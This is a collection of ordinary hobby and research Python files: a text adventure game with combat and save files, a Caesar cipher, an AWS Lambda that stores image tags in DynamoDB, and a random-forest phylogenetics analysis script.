[Y/N]\\n> \").title()\n if act == \"Y\":\n skeletonfight(player)\n if player.health <= 0:\n break\n else:\n player.gold += 125\n elif location == \"BossRoom\":\n BossFight(player)\n player.orb += 1\n else:\n print(\"You cannot go there.\")\n\n\ndef mov_val(location: str, goto: str) -> bool:\n return (location, goto) in mvmt\n\n\ndef move(location: str, player: Player) -> str:\n while True:\n goto = input(\"Where would you like to go?> \").title()\n if location == \"Dreadful Tunnels\" and goto == \"Entrance\":\n DreadTun(player, location)\n elif goto==\"Forrest2\" and player.orb==1:\n location='Crypt of the Conquered King'\n print(towns['Crypt of the Conquered King'])\n BossDun(player, location)\n break\n elif location==\"Forrest2\" and goto == \"Entrance\":\n BossDun(player, location)\n break\n elif goto == \"Forrest1\" or goto == \"Forrest3\":\n if mov_val(location, goto):\n forrest1 = random.randint(1, 4)\n forrest3 = random.randint(1, 4)\n if goto == \"Forrest1\":\n location = goto\n print(forrest[forrest1])\n break\n\n else:\n location = goto\n print(forrest[forrest3])\n break\n\n elif (location == \"Road1\" or location == \"Road3\") and mov_val(location, goto):\n if goto == \"Road2\":\n print(towns[goto])\n location = goto\n break\n elif location == \"Road1\" and goto == player.sideloc:\n print(towns[goto])\n location = goto\n break\n else:\n if player.sideloc == \"Waverly\":\n if goto == \"Kingston\" or goto == \"Oakland\":\n location = goto\n player.sideloc=goto\n print(towns[goto])\n break\n else:\n print(\n f\"You cannot goto {goto} from {location} coming from {player.sideloc}\"\n )\n break\n elif player.sideloc == \"Oakland\":\n if goto == \"Riverside\" or goto == \"Waverly\":\n location = goto\n player.sideloc=goto\n print(towns[goto])\n break\n else:\n print(\n f\"You cannot goto {goto} from {location} coming from {player.sideloc}\"\n )\n break\n elif player.sideloc == \"Riverside\":\n if goto == \"Kingston\" or goto == \"Oakland\":\n location = goto\n player.sideloc=goto\n print(towns[goto])\n break\n else:\n print(\n f\"You cannot goto {goto} from {location} coming from {player.sideloc}\"\n )\n break\n else:\n if goto == \"Riverside\" or goto == \"Waverly\":\n location = goto\n player.sideloc=goto\n print(towns[goto])\n break\n else:\n print(\n f\"You cannot goto {goto} from {location} coming from {player.sideloc}\"\n )\n break\n elif mov_val(location, goto):\n location = goto\n print(towns[goto])\n break\n else:\n print(f\"You cannot goto {goto} from {location}.\")\n break\n return location\n\ndef level_up(player: Player) -> None:\n player.level += 1\n player.max_health += 25\n player.max_mana += 25\n player.health = player.max_health\n player.mana = player.max_mana\n player.xp -= 100\n print(\"You have leveled up! 
Congratulations!\")\n print(f\"Player Level: {player.level}\")\n print(f\"Max Health: {player.max_health}\")\n print(f\"Max Mana: {player.max_mana}\")\n\ndef char_create(player: Player) -> None:\n while True:\n player.inventory = [\"Rusted Sword\", \"God Sword\"]\n print(\"Please create your character.\")\n player.name = input(\"Name: \")\n player.p_class = input(\"Pick Mage, Knight, or Rogue: \").title()\n ()\n if player.p_class == \"Mage\":\n player.health = 60\n player.mana = 100\n player.max_health = 60\n player.max_mana = 100\n player.skills = [\"Fireball\", \"Lunar Tempest\", \"Soul Rain\"]\n break\n elif player.p_class == \"Knight\":\n player.health = 100\n player.mana = 60\n player.max_health = 100\n player.max_mana = 60\n player.skills = [\"Vertical Arc\", \"Howling Octave\", \"Deadly Sins\"]\n break\n elif player.p_class == \"Rogue\":\n player.health = 75\n player.mana = 75\n player.max_health = 75\n player.max_mana = 75\n player.skills = [\"Long Shot\", \"Sneak Attack\", \"Sinister Strike\"]\n break\n else:\n print(\"That is not a valid input\")\n\n\ndef random_encounter() -> bool:\n encounter = random.randint(1, 5)\n if encounter == 1 or encounter == 2:\n return True\n else:\n return False\n\n\ndef random_mon() -> int:\n monster = random.randint(1, 4)\n return monster\n\n\ndef spell_input() -> str:\n spell = input(\"What spell do you want to cast? >\").title()\n return spell\n\n\ndef rogue_input() -> str:\n skill = input(\"What skill do you want to use? >\").title()\n return skill\n\n\ndef sword_skill_input() -> str:\n skill = input(\"Which sword skill would you like to use? \").title()\n return skill\n\ndef promotion(player: Player) -> None:\n print(\"You have reached level 10! You can now pick an advanced class.\")\n if player.p_class == \"Knight\":\n print(\"As a Knight, you can go into Paladin or Barbarian. As a Barbarian, you lose mana and gain an enourmous amount of health. As a Paladin, you get a decent amount of both.\")\n while True:\n act = input(\"Which one do you want? > \").title()\n if act == \"Barbarian\":\n player.max_health += 160\n player.max_mana -= 40\n player.advanced_class = \"Barbarian\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n elif act == \"Paladin\":\n player.max_health += 60\n player.max_mana += 60\n player.advanced_class = \"Paladin\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n elif player.p_class == \"Mage\":\n print(\"As a Mage, you can go into Grandmaster or Battlemage. As a Grandmaster, you gain a lot of mana but gain a slight amount of health. As a Battlemage, you get a decent amount of both.\")\n while True:\n act = input(\"Which one do you want? > \").title()\n if act == \"Grandmaster\":\n player.max_health += 20\n player.max_mana += 100\n player.advanced_class = \"Grandmaster\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n elif act == \"Battlemage\":\n player.max_health += 60\n player.max_mana += 60\n player.advanced_class = \"Battlemage\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n else:\n print(\"As a Rogue, you can go into Assassin or Pirate. As an Assassin, you gain a moderate amount of health and mana. As a Pirate, you gain a good amount of health and a slight amount of mana.\")\n while True:\n act = input(\"Which one do you want? 
> \").title()\n if act == \"Assassin\":\n player.max_health += 60\n player.max_mana += 60\n player.advanced_class = \"Assassin\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n elif act == \"Pirate\":\n player.max_health += 80\n player.max_mana += 40\n player.advanced_class = \"Pirate\"\n player.health = player.max_health\n player.mana = player.max_mana\n player.level += 1\n break\n\n\ndef combat(player: Player) -> None:\n random_mon()\n monsterhp = 70\n mon = random_mon()\n if mon == 1:\n monster = \"slime\"\n elif mon == 2:\n monster = \"goblin\"\n elif mon == 3:\n monster = \"skeleton\"\n elif mon == 4:\n monster = \"bandit\"\n print(f\"You are fighting a {monster}\")\n while monsterhp > 0 and player.health > 0:\n print(f\"Player Health: {player.health}\")\n print(f\"Player Mana: {player.mana}\")\n print(f\"{monster} Health: {monsterhp}\")\n if player.p_class == \"Knight\":\n move = input(\n \"\\nDo you want to [Attack], use a [Sword Skill], or use a [Potion]? \"\n ).title()\n if move == \"Sword Skill\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Sword Skill\":\n print(player.skills)\n skill = sword_skill_input()\n if skill in player.skills:\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n else:\n print(\"You missed!\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = weapons[player.curr_weapon]\n print(f\"You used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n else:\n print(\"You missed!\")\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(1, 8)\n print(\n f\"\\nIt is now the monster's turn.\\nThe monster attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n elif player.p_class == \"Mage\":\n print(\"Do you want to [Attack], use a [Spell], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Spell\" and player.mana <= 4:\n print(\"\\nYou have no mana and failed to attack!\")\n elif move == \"Spell\":\n print(player.skills)\n spell = spell_input()\n if spell in player.skills:\n if player.mana < skill_cost[spell]:\n print(\"You have no mana and failed to attack!\")\n else:\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = skill_damage[spell]\n monsterhp -= player_damage\n print(f\"You used {spell}, it does {player_damage} damage.\")\n player.mana -= skill_cost[spell]\n else:\n print(\"\\nYou missed!\")\n player.mana -= skill_cost[spell]\n elif move == \"Attack\":\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n else:\n print(\"\\nYou missed!\")\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(1, 8)\n print(\n f\"\\nIt is now the monster's turn.\\nThe monster attacks. 
It does {enemy_damage} damage.\\n\"\n            )\n            player.health = player.health - enemy_damage\n            if player.health < 0:\n                break\n        elif player.p_class == \"Rogue\":\n            print(\"Do you want to [Attack], use a [Skill], or use a [Potion]\")\n            move = input(\"> \").title()\n            if move == \"Skill\":\n                print(player.skills)\n                skill = rogue_input()\n                if skill in player.skills:\n                    roll = random.randint(1,10)\n                    hit = roll\n                    if hit != 3 and hit != 7:\n                        player_damage = skill_damage[skill]\n                        monsterhp -= player_damage\n                        print(f\"You used {skill}, it does {player_damage} damage.\")\n                        player.mana -= skill_cost[skill]\n                    else:\n                        print(\"You missed!\")\n                        player.mana -= skill_cost[skill]\n            elif move == \"Attack\":\n                roll = random.randint(1,10)\n                hit = roll\n                if hit != 3 and hit != 7:\n                    player_damage = weapons[player.curr_weapon]\n                    print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n                    monsterhp -= player_damage\n                else:\n                    print(\"You missed!\")\n            elif move == \"Potion\":\n                use_potion(player)\n            else:\n                print(\"This action is unavailable!\")\n            enemy_damage = random.randint(1, 8)\n            print(\n                f\"\\nIt is now the monster's turn.\\nThe monster attacks. It does {enemy_damage} damage.\\n\"\n            )\n            player.health = player.health - enemy_damage\n    player.xp += 15\n    player.gold += 70\n\n\n\ndef use_inventory(player: Player) -> None:\n    print(\"\\nThis is your inventory and stats.\")\n    print(f\"Player Health: {player.health}\")\n    print(f\"Player Mana: {player.mana}\")\n    print(f\"Player Level: {player.level}\")\n    print(f\"Player XP: {player.xp}\")\n    print(f\"Player Gold: {player.gold}\")\n    print(f\"Health Potion: {player.health_potion}\")\n    print(f\"Mana Potions: {player.mana_potion}\")\n    for item in player.inventory:\n        print(f\"{item}: {weapons[item]}\")\n    print(f\"You are currently using a {player.curr_weapon}\")\n    action = input(\"Do you want to [Equip] or go [Back]? \").title()\n    if action == \"Equip\":\n        equip = input(\"What do you want to equip? \").title()\n        if equip == player.curr_weapon:  # check this first, the current weapon is also in the inventory\n            print(\"You are already using this weapon.\")\n        elif equip in player.inventory:\n            player.curr_weapon = equip\n        else:\n            print(\"You do not have this item.\")\n    elif action == \"Back\":\n        return\n    else:\n        print(\"Not Valid\")\n\n\nstart_location = \"Oakland\"\n\n\ndef main():\n    location = start_location\n    player = Player(\"\", 100, 100, 100, 100, \"\", \"\", 1, 0, 99999, 1, \"God Sword\", 10, 10, [], [], 'Oakland', '')\n    while True:\n        start = input(\"Would you like to start a [New Game] or [Load]? 
\").title()\n if start == \"New Game\":\n char_create(player)\n break\n elif start == \"Load\":\n load = input(\"Player name: \")\n try:\n with open(f\"{load}/player_data.txt\", \"rb\") as file:\n player = pickle.load(file)\n with open(f\"{load}/location.txt\", \"rb\") as file:\n location = pickle.load(file)\n break\n except FileNotFoundError:\n print(\"There is not a save for this person.\")\n if location == \"Forrest1\" or location == \"Forrest3\":\n a=(1,2,3,4)\n loc=choice(a)\n print(forrest[loc])\n else:\n print(towns[location])\n while player.health > 0:\n if player.end=='END':\n print('You won the game!')\n break\n print(\"What would you like to do?\")\n if (\n location == \"Waverly\"\n or location == \"Riverside\"\n or location == \"Oakland\"\n or location == \"Kingston\"\n ):\n act = input(\"[Move], [Inventory], [Potion], [Save], [Shop], [Quit]\\n> \").title()\n else:\n act = input(\"[Move], [Inventory], [Potion], [Save], [Quit]\\n> \").title()\n if act == \"Inventory\":\n use_inventory(player)\n elif act == \"Potion\":\n use_potion(player)\n elif player.xp >= 100:\n level_up(player)\n elif player.level == 10:\n promotion(player)\n elif act == \"Add Level\":\n player.level += 1\n elif act == \"Save\":\n try:\n os.mkdir(player.name)\n except FileExistsError:\n pass\n with open(f\"{player.name}/player_data.txt\", \"wb\") as file:\n pickle.dump(player, file)\n with open(f\"{player.name}/location.txt\", \"wb\") as file:\n pickle.dump(location, file)\n elif act == \"Move\":\n location = move(location, player)\n if random_encounter():\n combat(player)\n elif player.health <= 0:\n print(\"You have died.\")\n else:\n print(\"You cannot do that.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rbennett1435/Unit-2-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":50183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36058608912","text":"import logo\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\nprint(logo.logo)\n\ndirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\ntext = input(\"Type your message:\\n\").lower()\nshift = int(input(\"Type the shift number:\\n\"))\nalphabet_length = len(alphabet)\n\ndef encrypt(user_text, user_shift):\n encrypted_text = \"\"\n\n for letter in user_text: # Looping through the whole text\n \n if letter == ' ': # Check for space character\n encrypted_text += ' ' # Append spaces as is\n continue # Move to the next iteration\n\n if letter not in alphabet:\n encrypted_text += letter\n continue\n\n index = alphabet.index(letter) # Getting index of each letter\n\n if direction == 'encode':\n new_index = (index + user_shift) % alphabet_length # modulo will give the remainder\n elif direction == 'decode':\n new_index = (index - user_shift) % alphabet_length\n else:\n print('Something went wrong... 
Check all the inputs and try again.')\n return\n\n letter = alphabet[new_index]\n encrypted_text += letter\n\n print(f'The result is: {encrypted_text}')\n\nif shift > alphabet_length:\n print('The shift cannot exceed the alphabet length!')\nelse:\n encrypt(text, shift)","repo_name":"Anveks/Python-Basics","sub_path":"small projects/caesar-cipher-app/cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20390378522","text":"import boto3\nimport json\n\n# Establish a boto3 session\ndynamodb = boto3.resource('dynamodb')\n\ndef lambda_handler(event, context):\n print(json.dumps(event)) \n # Parse incoming event\n #data = json.loads(event['body'])\n\n # Access the 'object_url' and 'labels' fields\n username = event['username']\n s3_url = event['object_url']\n tags = event['labels']\n\n # Specify your DynamoDB table\n table = dynamodb.Table('image_store')\n\n # Create a new item to insert into the table\n item = {\n 's3_url': s3_url,\n 'username': username,\n 'tags': tags\n }\n\n # Put the item into the table\n response = table.put_item(Item=item)\n\n # Return a response\n return {\n 'statusCode': 200,\n 'body': 'Image stored successfully'\n }\n","repo_name":"yuliang1005/AWS-SERVERLESS-SERVICE","sub_path":"store_image_to_dynamo.py","file_name":"store_image_to_dynamo.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16133655176","text":"import argparse\r\nimport sys\r\n\r\nimport numpy as np\r\nimport utils\r\nsys.path.append(\"/groups/itay_mayrose/danaazouri/PhyAI/code/\")\r\nimport warnings\r\n\r\nwarnings.filterwarnings(\"ignore\") # TEMP\r\n\r\n#from defs import *\r\n\r\n#from utils.tree_functions import get_total_branch_lengths\r\n# from sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestRegressor, RandomForestClassifier\r\n# from sklearn import svm\r\n# from sklearn.metrics import *\r\n# from sklearn import preprocessing\r\n# from sklearn.model_selection import cross_val_score\r\nfrom statistics import mean, median\r\n#from figures.violin_for_grant import *\r\n#from figures.confidence_interval_dts import plot_pred_true\r\n#from figures.accXsize_boxplot import accXsize_boxplot\r\n\r\n##################\r\n###### defs ######\r\nLABEL = \"d_ll_{}\"\r\nOPT_TYPE = \"br\"\r\nKFOLD = 10 # \"LOO\"\r\nGROUP_ID = 'group_id'\r\nN_ESTIMATORS = 100\r\nC = 95\r\nFEATURE_SELECTION = False # temp for running backwards selection\r\n\r\n\r\n##################\r\n\r\n\r\ndef score_rank(df_by_ds, sortby, locatein, random, scale_score):\r\n '''\r\n find the best tree in 'sortby' (e.g., predicted as the best) foreach dataset and locate its rank in 'locatein' (e.g., y_test)\r\n '''\r\n best_pred_ix = df_by_ds[sortby].idxmax() # changed min to max!\r\n if random:\r\n best_pred_ix = np.random.choice(df_by_ds[sortby].index, 1, replace=False)[0]\r\n temp_df = df_by_ds.sort_values(by=locatein, ascending=False).reset_index() # changed ascending to False\r\n best_pred_rank = min(temp_df.index[temp_df[\"index\"] == best_pred_ix].tolist())\r\n best_pred_rank += 1 # convert from pythonic index to position\r\n if scale_score:\r\n best_pred_rank /= len(df_by_ds[sortby].index) # scale the rank according to rankmax\r\n\r\n return best_pred_rank\r\n\r\n\r\ndef get_cumsun_preds(df_by_ds):\r\n df_by_ds[\"pred\"] /= df_by_ds[\"pred\"].sum()\r\n assert 
round(df_by_ds[\"pred\"].sum()) == 1\r\n    temp_df = df_by_ds.sort_values(by=\"pred\", ascending=False).reset_index()\r\n    sorted_preds = temp_df[\"pred\"]\r\n    cumsum_preds = sorted_preds.cumsum().values\r\n    temp_df[\"pred\"] = cumsum_preds\r\n\r\n    return temp_df\r\n\r\n\r\ndef get_cumsum_threshold(df_by_ds, label):\r\n    temp_df = get_cumsun_preds(df_by_ds)\r\n    best_pred_ix = df_by_ds[label].idxmax()\r\n    cumsum_true_best = temp_df[temp_df[\"index\"] == best_pred_ix][\"pred\"].values[0]\r\n\r\n    return cumsum_true_best\r\n\r\n\r\ndef calc_required_evaluations_score(grouped_df_by_ds, thresholds, c=C):\r\n    cumsums = []\r\n    threshold = np.percentile(thresholds, c)\r\n    # print(\"***\",threshold)\r\n    # plt.hist(thresholds)\r\n    # plt.show()\r\n    for group_id, df_by_ds in grouped_df_by_ds:\r\n        cumulative_scores = get_cumsun_preds(df_by_ds)[\"pred\"].values\r\n        res = round(100 * (len(np.where(cumulative_scores < threshold)[0])) / len(cumulative_scores), 2)\r\n        cumsums.append(res)\r\n\r\n    return cumsums\r\n\r\n\r\ndef ds_scores(df, move_type, random, scale_score):\r\n    rank_pred_by_ds, rank_test_by_ds = {}, {}\r\n\r\n    label = LABEL.format(move_type)\r\n    sp_corrs, r2s, errs_down, errs_up, all_true, all_preds, thresholds = [], [], [], [], [], [], []\r\n    grouped_df_by_ds = df.groupby(FEATURES[GROUP_ID], sort=False)\r\n    for group_id, df_by_ds in grouped_df_by_ds:\r\n        rank_pred_by_ds[group_id] = score_rank(df_by_ds, \"pred\", label, random, scale_score)\r\n        rank_test_by_ds[group_id] = score_rank(df_by_ds, label, \"pred\", random, scale_score)\r\n\r\n        all_true.append(df_by_ds[label].mean())\r\n        pred = df_by_ds[\"pred\"].mean()\r\n        all_preds.append(pred)\r\n        # r2s.append(r2_score(df_by_ds[label], df_by_ds[\"pred\"], multioutput='variance_weighted'))\r\n        temp_df = df_by_ds[[label, \"pred\"]]\r\n        sp_corr = temp_df.corr(method='spearman').iloc[1, 0]\r\n        if sp_corr:\r\n            if sp_corr < 0:\r\n                print(group_id, sp_corr)\r\n            sp_corrs.append(np.square(sp_corr))\r\n\r\n        # compute 'confidence score'\r\n        cumsum_true_best = get_cumsum_threshold(df_by_ds, label)\r\n        thresholds.append(cumsum_true_best)\r\n\r\n    required_evaluations_scores = calc_required_evaluations_score(grouped_df_by_ds, thresholds, c=C)\r\n\r\n    return rank_pred_by_ds, rank_test_by_ds, sp_corrs, r2s, required_evaluations_scores\r\n\r\n\r\ndef split_features_label(df, move_type, features):\r\n    attributes_df = df[features].reset_index(drop=True)\r\n    label_df = df[LABEL.format(move_type)].reset_index(drop=True)\r\n\r\n    x = np.array(attributes_df)\r\n    y = np.array(label_df).ravel()\r\n\r\n    return x, y\r\n\r\n\r\ndef apply_RFR(df_test, df_train, move_type, features):\r\n    X_train, y_train = split_features_label(df_train, move_type, features)\r\n    X_test, y_test = split_features_label(df_test, move_type, features)\r\n\r\n    regressor = RandomForestRegressor(n_estimators=N_ESTIMATORS, max_features=0.33, oob_score=True).fit(X_train,\r\n                                                                                                        y_train)  # 0.33=nfeatures/3. 
this is like in R (instead of default=n_features)\r\n y_pred = regressor.predict(X_test)\r\n oob = regressor.oob_score_\r\n f_imp = regressor.feature_importances_\r\n\r\n all_DTs_pred = []\r\n # all_DTs_pred = [t.predict(X_test) for t in regressor.estimators_]\r\n # dev_vec = confidence_score(all_DTs_pred, y_pred, percentile=90)\r\n\r\n return y_pred, all_DTs_pred, oob, f_imp\r\n\r\n\r\ndef truncate(df):\r\n df = df.dropna()\r\n groups_ids = df[FEATURES[GROUP_ID]].unique()\r\n kfold = len(groups_ids) if KFOLD == \"LOO\" else KFOLD\r\n assert len(groups_ids) >= kfold\r\n ndel = len(groups_ids) % kfold\r\n if ndel != 0: # i removed datasets from the end, and not randomly. from some reason..\r\n for group_id in groups_ids[:-ndel - 1:-1]:\r\n df = df[df[FEATURES[GROUP_ID]] != group_id]\r\n\r\n groups_ids = df[FEATURES[GROUP_ID]].unique()\r\n new_length = len(groups_ids) - ndel\r\n test_batch_size = int(new_length / kfold)\r\n\r\n return df.reset_index(drop=True), groups_ids, test_batch_size\r\n\r\n\r\ndef cross_validation_RF(df, move_type, features, validation_set=False, random=False, scale_score=True):\r\n # '''\r\n df, groups_ids, test_batch_size = truncate(df)\r\n res_dict = {}\r\n oobs, f_imps, = [], []\r\n my_y_pred, imps = np.full(len(df), np.nan), np.full(len(df), np.nan)\r\n\r\n if not validation_set:\r\n for low_i in groups_ids[::test_batch_size]:\r\n low_i, = np.where(groups_ids == low_i)\r\n low_i = int(low_i)\r\n up_i = low_i + test_batch_size\r\n\r\n test_ixs = groups_ids[low_i:up_i]\r\n train_ixs = np.setdiff1d(groups_ids, test_ixs)\r\n df_test = df.loc[df[FEATURES[GROUP_ID]].isin(test_ixs)]\r\n df_train = df.loc[df[FEATURES[GROUP_ID]].isin(train_ixs)]\r\n\r\n y_pred, all_DTs_pred, oob, f_imp = apply_RFR(df_test, df_train, move_type, features)\r\n\r\n oobs.append(oob)\r\n f_imps.append(f_imp)\r\n my_y_pred[\r\n df_test.index.values] = y_pred # sort the predictions into a vector sorted according to the respective dataset\r\n\r\n df[\"pred\"] = my_y_pred\r\n\r\n else: # namely if validation set strategy, and not cross validation\r\n df_train = df\r\n df_test = pd.read_csv(dirpath + LEARNING_DATA.format(\"all_moves\", \"1_validation\"))\r\n df_test = fit_transform(df_test, move_type, rank=False).dropna()\r\n y_pred, all_DTs_pred, oob, f_imp = apply_RFR(df_test, df_train, move_type, features)\r\n\r\n oobs.append(oob)\r\n f_imps.append(f_imp)\r\n df_test[\"pred\"] = y_pred # the predictions vec is the same lengths of test set\r\n df = df_test\r\n # '''\r\n\r\n rank_pred_by_ds, rank_test_by_ds, corrs, r2s, required_evaluations_scores = ds_scores(df, move_type, random,\r\n scale_score)\r\n\r\n # averaged over cv iterations\r\n res_dict['oob'] = sum(oobs) / len(oobs)\r\n res_dict['f_importance'] = sum(f_imps) / len(f_imps)\r\n # foreach dataset (namely arrays are of lengths len(sampled_datasets)\r\n res_dict[\"rank_first_pred\"] = rank_pred_by_ds\r\n res_dict[\"rank_first_true\"] = rank_test_by_ds\r\n res_dict[\"spearman_corr\"] = corrs\r\n res_dict['%neighbors'] = required_evaluations_scores\r\n\r\n groups_ids = df[FEATURES[GROUP_ID]].unique()\r\n suf = \"_validation_set\" if validation_set else \"\"\r\n df.to_csv(dirpath + DATA_WITH_PREDS.format(str(len(features)) + suf)) # + \"_\" + features[0]\r\n return res_dict, groups_ids\r\n\r\n\r\ndef fit_transform(df, move_type, rank=False):\r\n scores_range = (1, 100)\r\n groups_ids = df[FEATURES[GROUP_ID]].unique()\r\n for group_id in groups_ids:\r\n scaling_factor = df[df[FEATURES[GROUP_ID]] == group_id][\"orig_ds_ll\"].iloc[0]\r\n 
df.loc[df[FEATURES[GROUP_ID]] == group_id, LABEL.format(move_type)] /= scaling_factor\r\n        if rank:\r\n            df.loc[df[FEATURES[GROUP_ID]] == group_id, LABEL.format(move_type)] = df.loc[\r\n                df[FEATURES[GROUP_ID]] == group_id, LABEL.format(move_type)].rank(ascending=False)  # , pct=True)\r\n\r\n    # MinMaxScaler\r\n    # s = df[LABEL.format(move_type)].values\r\n    # s_scaled = ((s - s.min(axis=0)) / (s.max(axis=0) - s.min(axis=0))) * (scores_range[1] - scores_range[0]) + scores_range[0]\r\n    # df[LABEL.format(move_type)] = s_scaled\r\n\r\n    # df.loc[df[FEATURES[GROUP_ID]] == group_id, LABEL.format(move_type)].plot.hist(by=FEATURES[GROUP_ID])\r\n    # plt.show()\r\n\r\n    return df\r\n\r\n\r\ndef parse_relevant_summaries_for_learning(df_orig, outpath, move_type, step_number, all_moves=False):\r\n    ds_path_init = df_orig.iloc[0][\"path\"]\r\n    cols = list(pd.read_csv(SUMMARY_PER_DS.format(ds_path_init, move_type, OPT_TYPE, step_number)))\r\n    cols.insert(1, \"path\")\r\n    cols.extend([FEATURES[GROUP_ID], FEATURES[\"group_tbl\"]])  # add for group features\r\n    df = pd.DataFrame(index=np.arange(0), columns=cols)\r\n\r\n    for i, row in df_orig.iterrows():\r\n        ds_path = row[\"path\"]\r\n        ds_tbl = get_total_branch_lengths(ds_path + PHYML_TREE_FILENAME.format('bionj'))\r\n        summary_per_ds = SUMMARY_PER_DS.format(ds_path, move_type, OPT_TYPE, step_number)\r\n        print(summary_per_ds)\r\n        if os.path.exists(summary_per_ds) and FEATURES[\"bl\"] in pd.read_csv(summary_per_ds).columns:\r\n            df_ds = pd.read_csv(summary_per_ds)\r\n\r\n            if all_moves:\r\n                df_ds.insert(1, \"path\", ds_path)\r\n                df_ds[FEATURES[GROUP_ID]] = str(i)\r\n                df_ds[FEATURES[\"group_tbl\"]] = ds_tbl\r\n                df = pd.concat([df, df_ds], ignore_index=True)\r\n            else:\r\n                grouped = df_ds.groupby(\"{}_name\".format(move_type), sort=False)\r\n                for j, (name, group) in enumerate(grouped):\r\n                    best_row_group = list(\r\n                        group.loc[group[LABEL.format(move_type)].astype(float).idxmax()].values)  # changed min to max!\r\n                    best_row_group.insert(1, ds_path)\r\n                    best_row_group.extend([str(i), ds_tbl])  # add group features\r\n                    df.loc[str(i) + \",\" + str(j)] = best_row_group\r\n\r\n    df.to_csv(outpath)\r\n\r\n\r\ndef print_and_index_results(df_datasets, res_dict, move_type, sscore, features, val=False):\r\n    #### score 1 ####\r\n    spearman_corrs = res_dict['spearman_corr']\r\n    df_datasets['corr'] = spearman_corrs\r\n    print(\"\\nspearman corr:\\n\" + \"mean:\", mean([e for e in spearman_corrs if not math.isnan(e)]), \", median:\",\r\n          median(spearman_corrs))\r\n\r\n    #### score 2 + 3 ####\r\n    res_vec1 = np.asarray(list(res_dict['rank_first_pred'].values())) if type(res_dict['rank_first_pred']) is dict else \\\r\n        res_dict['rank_first_pred']\r\n    res_vec2 = np.asarray(list(res_dict['rank_first_true'].values())) if type(res_dict['rank_first_true']) is dict else \\\r\n        res_dict['rank_first_true']\r\n    scores_range = (1, 100)  # for MinMaxScaler\r\n    res_vec1_scaled = ((res_vec1 - res_vec1.min(axis=0)) / (res_vec1.max(axis=0) - res_vec1.min(axis=0))) * (\r\n            scores_range[1] - scores_range[0]) + scores_range[0]\r\n    res_vec2_scaled = ((res_vec2 - res_vec2.min(axis=0)) / (res_vec2.max(axis=0) - res_vec2.min(axis=0))) * (\r\n            scores_range[1] - scores_range[0]) + scores_range[0]\r\n    df_datasets['best_predicted_ranking'] = res_vec1_scaled\r\n    df_datasets['best_empirically_ranking'] = res_vec2_scaled\r\n    print(\"\\nbest predicted rank in true:\\n\" + \"mean:\", np.mean(res_vec1_scaled), \", median:\",\r\n          np.median(res_vec1_scaled))\r\n    print(\"\\nbest true rank in pred :\\n\" + \"mean:\", 
np.mean(res_vec2_scaled), \", median:\", np.median(res_vec2_scaled))\r\n\r\n #### score 4 ####\r\n res_vec2_scaled.sort()\r\n sorted_true_scaled = res_vec2_scaled[::-1]\r\n index95 = int(0.05 * len(sorted_true_scaled) - 1) # index for loc 0.05 = 95%\r\n required_evaluations = res_dict['%neighbors']\r\n df_datasets['required_evaluations_0.95'] = required_evaluations\r\n print(\"\\nIn 0.95: {}%\".format(sorted_true_scaled[index95]))\r\n print(\"\\nmean %neighbors (0.95): {}\".format(sum(required_evaluations) / len(required_evaluations)))\r\n\r\n # '''### feature importance ####\r\n mean_importances = res_dict['f_importance'] # index in first row only (score foreach run and not foreach dataset)\r\n for i, f in enumerate(features):\r\n colname = \"imp_\" + f\r\n df_datasets.loc[0, colname] = mean_importances[i]\r\n # print(\"\\nmean f importance:\\n\", np.column_stack((features, mean_importances)))\r\n\t# plot_cumulative_importance(features, mean_importances, move_type, sscore)\r\n # '''\r\n #### additional information ####\r\n df_datasets.loc[0, 'oob'] = res_dict['oob'] # index in first row only (score foreach run and not foreach dataset)\r\n print(\"oob:\", res_dict['oob'])\r\n print(\"ndatasets: \", len(res_vec1))\r\n\r\n suf = \"_validation_set\" if val else \"\"\r\n df_datasets.to_csv(dirpath + SCORES_PER_DS.format(str(len(features)) + suf)) # + \"_\" + features[0]\r\n print(\"##########################\")\r\n\r\n return\r\n\r\n\r\ndef sort_features(res_dict, features):\r\n feature_importances = [(feature, round(importance, 4)) for feature, importance in\r\n zip(features, res_dict['f_importance'])]\r\n feature_importances = sorted(feature_importances, key=lambda x: x[1], reverse=True) # most important first\r\n sorted_importances = [importance[1] for importance in feature_importances]\r\n sorted_features = 